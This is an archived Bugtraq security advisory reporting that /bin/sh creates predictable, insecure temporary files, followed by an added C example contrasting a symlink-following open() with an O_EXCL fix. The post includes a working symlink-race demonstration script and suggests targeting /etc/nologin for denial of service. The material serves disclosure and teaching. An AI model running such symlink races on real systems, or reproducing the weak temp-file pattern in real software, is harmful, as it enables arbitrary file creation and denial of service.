Bugtraq mailing list archives

/bin/sh creates insecure tmp files


From: Paul Szabo <psz () MATHS USYD EDU AU>
Date: Thu, 23 Nov 2000 13:25:28 +1100

Similarly to the recently discussed tcsh vulnerability, the Bourne shell
/bin/sh also creates temporary files in an insecure way, and can be
exploited to create arbitrary files or to overwrite existing ones. While
this vulnerability can be exploited for a denial-of-service attack, it is
not clear how to use it to gain additional privileges.

I have confirmed this vulnerability in two (recent-version) commercial
UNIXes.

Demonstration:

#!/bin/sh -x
ls -l /tmp/nologin
ln -s /tmp/nologin /tmp/sh$$0
cat <<EOF
Only root can create /etc/nologin.
Do any boot-time scripts use sh?
EOF
ls -l /tmp/nologin

Paul Szabo - psz () maths usyd edu au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia
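
The fix for this class of bug, as an added example that is not part of the original post and not code from any vendor's shell: the same predictable-name open done without and with O_EXCL, run against a symlink planted in a private scratch directory. The directory name, the file names "victim" and "sh123450", and the function names are constructed for illustration.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak pattern: predictable name opened without O_EXCL, so a symlink
   planted at that name beforehand is followed and its target created. */
static int open_weak(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened pattern: with O_CREAT|O_EXCL, open() fails with EEXIST if the
   name is occupied by anything, including a dangling symlink. */
static int open_excl(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Constructed scenario inside a private scratch directory (names are
   assumptions): a symlink sits at the predictable name "sh123450".
   Returns 1 if opening that name created the symlink target, 0 if it
   did not, -1 on setup failure. errno holds the open() result. */
int target_created(int hardened) {
    char dir[] = "/tmp/heredoc-demo-XXXXXX";
    char lnk[64], target[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/sh123450", dir);
    if (symlink(target, lnk) != 0) { rmdir(dir); return -1; }
    errno = 0;
    int fd = hardened ? open_excl(lnk) : open_weak(lnk);
    int open_errno = errno;
    if (fd >= 0) close(fd);
    int created = (stat(target, &st) == 0);
    unlink(target);
    unlink(lnk);
    rmdir(dir);
    errno = open_errno;
    return created;
}

int main(void) {
    printf("weak open created target:   %d\n", target_created(0));
    printf("O_EXCL open created target: %d\n", target_created(1));
    return 0;
}
```

mkstemp(3) applies the same exclusive create and also picks an unpredictable name, which removes the need to guess-proof the name by hand.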

